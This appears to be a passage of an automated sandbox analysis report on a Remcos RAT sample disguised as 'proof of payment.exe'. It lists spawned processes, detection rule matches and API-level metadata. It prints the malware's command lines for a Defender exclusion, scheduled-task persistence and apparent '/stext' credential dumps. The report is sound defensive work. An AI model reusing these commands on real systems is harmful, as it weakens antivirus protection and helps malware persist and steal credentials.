                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    Target ID:3
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                                    Imagebase:0xe30000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:4
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                                    Imagebase:0x460000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:7
                                    Start time:13:13:18
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe"
                                    Imagebase:0xf20000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    Target ID:8
                                    Start time:13:13:18
                                    Start date:03/05/2024
                                    Path:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Imagebase:0x1f0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1540918015.0000000003837000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.1540918015.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 61%, ReversingLabs
                                    • Detection: 56%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:true

                                    Target ID:9
                                    Start time:13:13:19
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff72d8c0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpE166.tmp"
                                    Imagebase:0x460000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:13:13:23
                                    Start date:03/05/2024
                                    Path:C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                                    Imagebase:0x680000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1517511733.0000000000E57000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                    • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                    Reputation:low
                                    Has exited:true

                                    Target ID:15
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\uevjjogtpiaq"
                                    Imagebase:0x750000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:16
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                                    Imagebase:0x150000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:17
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\eyacchqudqsuyhp"
                                    Imagebase:0xcc0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:18
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x190000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:19
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x100000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:20
                                    Start time:13:13:40
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe" /stext "C:\Users\user\AppData\Local\Temp\pbfmdzborykhjndcrx"
                                    Imagebase:0x950000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:7.8%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:46
                                      Total number of Limit Nodes:4
                                      execution_graph 14495 d5d421 14496 d5d3e4 DuplicateHandle 14495->14496 14498 d5d42a 14495->14498 14497 d5d3f6 14496->14497 14499 d54668 14500 d5467a 14499->14500 14501 d54686 14500->14501 14503 d54779 14500->14503 14504 d5479d 14503->14504 14508 d54888 14504->14508 14512 d54878 14504->14512 14510 d548af 14508->14510 14509 d5498c 14509->14509 14510->14509 14516 d5449c 14510->14516 14514 d548af 14512->14514 14513 d5498c 14514->14513 14515 d5449c CreateActCtxA 14514->14515 14515->14513 14517 d55918 CreateActCtxA 14516->14517 14519 d559db 14517->14519 14520 d5ad98 14523 d5ae90 14520->14523 14521 d5ada7 14524 d5aea1 14523->14524 14525 d5aec4 14523->14525 14524->14525 14531 d5b118 14524->14531 14535 d5b128 14524->14535 14525->14521 14526 d5aebc 14526->14525 14527 d5b0c8 GetModuleHandleW 14526->14527 14528 d5b0f5 14527->14528 14528->14521 14532 d5b13c 14531->14532 14534 d5b161 14532->14534 14539 d5a8d0 14532->14539 14534->14526 14536 d5b13c 14535->14536 14537 d5a8d0 LoadLibraryExW 14536->14537 14538 d5b161 14536->14538 14537->14538 14538->14526 14541 d5b308 LoadLibraryExW 14539->14541 14542 d5b381 14541->14542 14542->14534 14543 d5d118 14544 d5d15e GetCurrentProcess 14543->14544 14546 d5d1b0 GetCurrentThread 14544->14546 14547 d5d1a9 14544->14547 14548 d5d1e6 14546->14548 14549 d5d1ed GetCurrentProcess 14546->14549 14547->14546 14548->14549 14552 d5d223 14549->14552 14550 d5d24b GetCurrentThreadId 14551 d5d27c 14550->14551 14552->14550

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D196
                                      • GetCurrentThread.KERNEL32 ref: 00D5D1D3
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D210
                                      • GetCurrentThreadId.KERNEL32 ref: 00D5D269
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: ac80616a860e8f19c47b72621d578631812a9fac939993270066161118062385
                                      • Instruction ID: ef1b463ba89c1aac6323875e5a784905aa9bb9ddae6d1a63b8406856b2155320
                                      • Opcode Fuzzy Hash: ac80616a860e8f19c47b72621d578631812a9fac939993270066161118062385
                                      • Instruction Fuzzy Hash: FF5169B09017098FEB54DFA9D548BAEBBF1EF48304F248069E849A7390CB749948CB75
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D196
                                      • GetCurrentThread.KERNEL32 ref: 00D5D1D3
                                      • GetCurrentProcess.KERNEL32 ref: 00D5D210
                                      • GetCurrentThreadId.KERNEL32 ref: 00D5D269
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Current$ProcessThread
                                      • String ID:
                                      • API String ID: 2063062207-0
                                      • Opcode ID: 4418647bc4ba64eba575b1be3f0632bb192a17e93280d392a650ed616bdce995
                                      • Instruction ID: 74947e1f703de95cad166e4c6094efdd67c80ef1f60b9903085a5abee7a6e657
                                      • Opcode Fuzzy Hash: 4418647bc4ba64eba575b1be3f0632bb192a17e93280d392a650ed616bdce995
                                      • Instruction Fuzzy Hash: A15168B09017098FEB54DFA9D548BAEBBF1EF48304F248069E849A7350DB74A944CB75
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 45 d5ae90-d5ae9f 46 d5aea1-d5aeae call d59898 45->46 47 d5aecb-d5aecf 45->47 54 d5aec4 46->54 55 d5aeb0 46->55 49 d5aed1-d5aedb 47->49 50 d5aee3-d5af24 47->50 49->50 56 d5af26-d5af2e 50->56 57 d5af31-d5af3f 50->57 54->47 100 d5aeb6 call d5b118 55->100 101 d5aeb6 call d5b128 55->101 56->57 58 d5af41-d5af46 57->58 59 d5af63-d5af65 57->59 61 d5af51 58->61 62 d5af48-d5af4f call d5a874 58->62 64 d5af68-d5af6f 59->64 60 d5aebc-d5aebe 60->54 63 d5b000-d5b0c0 60->63 66 d5af53-d5af61 61->66 62->66 95 d5b0c2-d5b0c5 63->95 96 d5b0c8-d5b0f3 GetModuleHandleW 63->96 67 d5af71-d5af79 64->67 68 d5af7c-d5af83 64->68 66->64 67->68 69 d5af85-d5af8d 68->69 70 d5af90-d5af92 call d5a884 68->70 69->70 74 d5af97-d5af99 70->74 76 d5afa6-d5afab 74->76 77 d5af9b-d5afa3 74->77 78 d5afad-d5afb4 76->78 79 d5afc9-d5afd6 76->79 77->76 78->79 81 d5afb6-d5afc6 call d5a894 call d5a8a4 78->81 85 d5aff9-d5afff 79->85 86 d5afd8-d5aff6 79->86 81->79 86->85 95->96 97 d5b0f5-d5b0fb 96->97 98 d5b0fc-d5b110 96->98 97->98 100->60 101->60
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D5B0E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: 7a1e852a180552db2e9f390f37e224e1c3409adfc3e45a68c69d5aa69dc6615f
                                      • Instruction ID: e845ceb80d72adee4271756afb2c464b600fcc24de1e36e7af9eaafdd78fb54d
                                      • Opcode Fuzzy Hash: 7a1e852a180552db2e9f390f37e224e1c3409adfc3e45a68c69d5aa69dc6615f
                                      • Instruction Fuzzy Hash: A97137B0A00B158FDB24DF69D05175ABBF1FF88311F048A2DE886D7A50DB75E849CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 102 d5449c-d559d9 CreateActCtxA 105 d559e2-d55a3c 102->105 106 d559db-d559e1 102->106 113 d55a3e-d55a41 105->113 114 d55a4b-d55a4f 105->114 106->105 113->114 115 d55a51-d55a5d 114->115 116 d55a60 114->116 115->116 118 d55a61 116->118 118->118
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00D559C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 93cec17b4ea8e680309e10b7bc2dbe02393037103adfbc803c3f962af967f756
                                      • Instruction ID: 1a21345b5e11ad9f5f143721d4c699986dbf379aff646b0284bd68a64677b317
                                      • Opcode Fuzzy Hash: 93cec17b4ea8e680309e10b7bc2dbe02393037103adfbc803c3f962af967f756
                                      • Instruction Fuzzy Hash: 8041D2B0C00719CBDF24DFA9C844B9EBBF5BF48304F24856AD818AB255DB756949CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 119 d5590c-d55913 120 d5591c-d559d9 CreateActCtxA 119->120 122 d559e2-d55a3c 120->122 123 d559db-d559e1 120->123 130 d55a3e-d55a41 122->130 131 d55a4b-d55a4f 122->131 123->122 130->131 132 d55a51-d55a5d 131->132 133 d55a60 131->133 132->133 135 d55a61 133->135 135->135
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00D559C9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 26816cbd3193f2dae232e67bcc253d6520995b6359ad5b5ef164eb83bb508605
                                      • Instruction ID: 6bf494fb5946447ba45818312d4bd74e5244ee59cf185aa9bc172861e73032db
                                      • Opcode Fuzzy Hash: 26816cbd3193f2dae232e67bcc253d6520995b6359ad5b5ef164eb83bb508605
                                      • Instruction Fuzzy Hash: 1F41DFB1C00719CBDF24DFA9D884B8DBBF1BF48304F24856AD818AB255DB75694ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 136 d5d421-d5d428 137 d5d3e4-d5d3f4 DuplicateHandle 136->137 138 d5d42a-d5d54e 136->138 139 d5d3f6-d5d3fc 137->139 140 d5d3fd-d5d41a 137->140 139->140
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 8b20dcd85321f88388560c4a330addd33b8d26953280d878271d123231737503
                                      • Instruction ID: b02a0166e3cef53ab50e30ddeb64239d70d7cdd817e8e78fb37a3f448b80d7ff
                                      • Opcode Fuzzy Hash: 8b20dcd85321f88388560c4a330addd33b8d26953280d878271d123231737503
                                      • Instruction Fuzzy Hash: 3E318C746503808FEB00DF64E8547693BA6F7C8760F10842AE9119B3EACBF88C45CB71
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 154 d5d358-d5d3f4 DuplicateHandle 155 d5d3f6-d5d3fc 154->155 156 d5d3fd-d5d41a 154->156 155->156
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 69621bee522510ad04a1c0ac18a54dd1f653190cb82d103504b0e5d30aee0a27
                                      • Instruction ID: a8646a772ec405039b660ba59f316cd2600ef93e55336687d4266b5e84c71762
                                      • Opcode Fuzzy Hash: 69621bee522510ad04a1c0ac18a54dd1f653190cb82d103504b0e5d30aee0a27
                                      • Instruction Fuzzy Hash: B821E2B5D00209DFDB10CFAAD584AEEBBF5EB48310F14842AE958B7350C378A954CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 159 d5d360-d5d3f4 DuplicateHandle 160 d5d3f6-d5d3fc 159->160 161 d5d3fd-d5d41a 159->161 160->161
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D5D3E7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: fc6ca9cc0a40f847b03039bbb4331fe8be70007da766b3896faccdc0a58b2a88
                                      • Instruction ID: 1163525110baafd5bc25f79b7583299ebbd037c3cd9c01140cf60e981ab6a254
                                      • Opcode Fuzzy Hash: fc6ca9cc0a40f847b03039bbb4331fe8be70007da766b3896faccdc0a58b2a88
                                      • Instruction Fuzzy Hash: AF21E4B5D00209DFDB10CFAAD484ADEFBF5EB48310F14842AE954A7350D374A954CF65
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 164 d5a8d0-d5b348 166 d5b350-d5b37f LoadLibraryExW 164->166 167 d5b34a-d5b34d 164->167 168 d5b381-d5b387 166->168 169 d5b388-d5b3a5 166->169 167->166 168->169
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D5B161,00000800,00000000,00000000), ref: 00D5B372
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 88afb1f3dd864649eb26aad93069e943acbef9e7f3b2562e82249fd4534e6843
                                      • Instruction ID: 6ce318fb456b5ef957aa7f29a8f16bfea2f83d72058a41d5fe1fbed2106454ed
                                      • Opcode Fuzzy Hash: 88afb1f3dd864649eb26aad93069e943acbef9e7f3b2562e82249fd4534e6843
                                      • Instruction Fuzzy Hash: 441103B68003489FDF10CF9AD444AAEFBF4EB48320F14842AE859B7200C375A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 172 d5b300-d5b348 173 d5b350-d5b37f LoadLibraryExW 172->173 174 d5b34a-d5b34d 172->174 175 d5b381-d5b387 173->175 176 d5b388-d5b3a5 173->176 174->173 175->176
                                      APIs
                                      • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,00D5B161,00000800,00000000,00000000), ref: 00D5B372
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 94ae760d5c6249aa2d187ea1db27d86bc2495bf0cf4911ee6ab862e79c4c03a4
                                      • Instruction ID: 409119f494298ac3d24147ad50053ee9c7c32747484fce9628c5931df7ba153c
                                      • Opcode Fuzzy Hash: 94ae760d5c6249aa2d187ea1db27d86bc2495bf0cf4911ee6ab862e79c4c03a4
                                      • Instruction Fuzzy Hash: 371114B6D002498FDF14CFAAD444AEEFBF4EB48310F14846AD859A7600C375A549CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 179 d5b080-d5b0c0 180 d5b0c2-d5b0c5 179->180 181 d5b0c8-d5b0f3 GetModuleHandleW 179->181 180->181 182 d5b0f5-d5b0fb 181->182 183 d5b0fc-d5b110 181->183 182->183
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00D5B0E6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1499167345.0000000000D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_d50000_proof of payment.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: a419978a0d8ae25a537677bf65f21330184b235c365556ab8f73cb6aa6884a7f
                                      • Instruction ID: 395dd3329c69f8287f8293e1c282e5e6ffa408c7f5f1c2d1d872aa4abd15c970
                                      • Opcode Fuzzy Hash: a419978a0d8ae25a537677bf65f21330184b235c365556ab8f73cb6aa6884a7f
                                      • Instruction Fuzzy Hash: 3F11DFB5C007498FDB20DF9AD444BEEFBF4AF89320F14842AD869A7250C375A549CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4bea25e7601e0c727ddcd1561f2dfaac0ac250d7581400545940d26d7dffcbe5
                                      • Instruction ID: 2267db44154cc0d73fcd517c245aba966cdfdedcdc0e996fd3a6a2a8b824d6e9
                                      • Opcode Fuzzy Hash: 4bea25e7601e0c727ddcd1561f2dfaac0ac250d7581400545940d26d7dffcbe5
                                      • Instruction Fuzzy Hash: 4C2137B1904344DFEB05DF10D9C0B26BF65FB89318F24C569E80ACBA56C336D856CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1497613728.00000000008AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 008AD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_8ad000_proof of payment.jbxd
                                      Similarity
